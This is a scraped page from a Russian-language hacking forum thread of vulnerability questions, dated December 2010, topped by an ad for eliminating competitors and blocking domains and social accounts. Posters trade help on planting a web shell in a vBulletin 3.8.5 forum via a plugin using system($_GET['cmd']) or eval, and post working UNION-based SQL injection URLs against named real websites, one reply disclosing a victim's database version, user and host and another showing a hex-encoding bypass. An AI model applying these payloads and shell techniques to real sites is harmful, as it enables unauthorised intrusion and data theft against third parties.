УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1592 из 2438

1592

Опции темы

Поиск в этой теме

Опции просмотра

#15911

18.12.2010, 15:37

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от I love this game

I love this game said:
Подскажите с залитием шелла в булку
Версия 3.8.5
сделал плагин с шеллом
/forum/faq.php?cmd=dir работает
а phpinfo и остальное не хочет, в чем проблема!
И кто знает еще способы залить шелл в этой версии!

дай угадаю, в faq.php ты засунул код system($_GET['cmd']) а ОС сервера на котором стоит атакуемый сайт Windows

Используй какие-нибудь callback функции или же просто eval, для выполнения своего php кода.

#15912

18.12.2010, 15:56

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

Цитата:

Сообщение от Expl0ited

Expl0ited said:
дай угадаю, в faq.php ты засунул код system($_GET['cmd']) а ОС сервера на котором стоит атакуемый сайт Windows
Используй какие-нибудь callback функции или же просто eval, для выполнения своего php кода.

не угaдал...он все правильно туда ставил и ось там была *никс...просто сайт раньше ломали и админ кое что в настройках сервера подправил...но хитрым способом это можно было обойти и в итоге шелл был залит.

#15913

18.12.2010, 16:43

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от Gorev

Gorev said:
не угaдал...он все правильно туда ставил и ось там была *никс...просто сайт раньше ломали и админ кое что в настройках сервера подправил...но хитрым способом это можно было обойти и в итоге шелл был залит.

тогда что это за странная конструкция faq.php?cmd=dir?

#15914

18.12.2010, 17:02

Samael91

Guest

Сообщений: n/a

Провел на форуме:
14366

Репутация: 0

Народ, подскажите это PHP-inj или фрейм http://www.prodisney.ru/index.php?page=index.php и если это фрейм то что должно было быть при PHP-inj?

#15915

18.12.2010, 17:13

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Цитата:

Сообщение от Samael91

Samael91 said:
Народ, подскажите это PHP-inj или фрейм http://www.prodisney.ru/index.php?page=index.php и если это фрейм то что должно было быть при PHP-inj?

Смотрим сурс:

Код:

Code:

Фрейм - страница вставлена во фрейм

Читалка - видешь сурс страница, в т.ч. и PHP.

PHP-inject - это include('page.php'); PHP выучи хотябы а потом уже хацкери =\\

#15916

18.12.2010, 18:17

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Цитата:

Сообщение от Expl0ited

Expl0ited said:
тогда что это за странная конструкция faq.php?cmd=
dir
?

человек не особо разбирается в никс коммандах....

#15917

18.12.2010, 22:54

FlaktW

Участник форума

Регистрация: 19.08.2009

Сообщений: 115

Провел на форуме:
111014

Репутация: 8

Не получается вывести версию БД.

http://www.vyo.org/index.php?events/action/show/id/event/yr/2010/mon/-12+union+select+1,2,version(),4,5,6,7,8,9+--+

#15918

18.12.2010, 23:20

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Цитата:

Сообщение от FlaktW

FlaktW said:
Не получается вывести версию БД.
http://www.vyo.org/index.php?events/action/show/id/event/yr/2010/mon/-12+union+select+1,2,version(),4,5,6,7,8,9+--+

version: 5.0.54-log

user: vyoadb@67.199.10.33

database: dbvyoa

писать в личку и дальше спрашивать как я получил это не следует..Я УГАДАЛ !!!

ЗЫ. Вопросы по раскрутке уже задолбали

#15919

19.12.2010, 02:42

toX1k

Guest

Сообщений: n/a

Провел на форуме:
482

Репутация: -1

http://engr.oregonstate.edu/oregonstater/citation.php?id=290+and+1=0+union+select+1,2,3,4,5 ,6,column_name,8,9,10,11 FROM INFORMATION_SCHEMA.columns where table_name='USER_PRIVILEGES' --

как будет правильно составить запрос?

#15920

19.12.2010, 03:12

~d0s~

Познающий

Регистрация: 17.04.2010

Сообщений: 75

Провел на форуме:
691279

Репутация: 55

toX1k

могически_кавычке = on

хекс юзай и почитай маны

http://engr.oregonstate.edu/oregonstater/citation.php?id=290+and+1=0+union+select+1,2,3,4,5 ,6,column_name,8,9,10,11+FROM+INFORMATION_SCHEMA.c olumns+where+table_name=0x555345525F50524956494C45 474553--

P.S. пробелы убери

Страница 1592 из 2438

1592

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход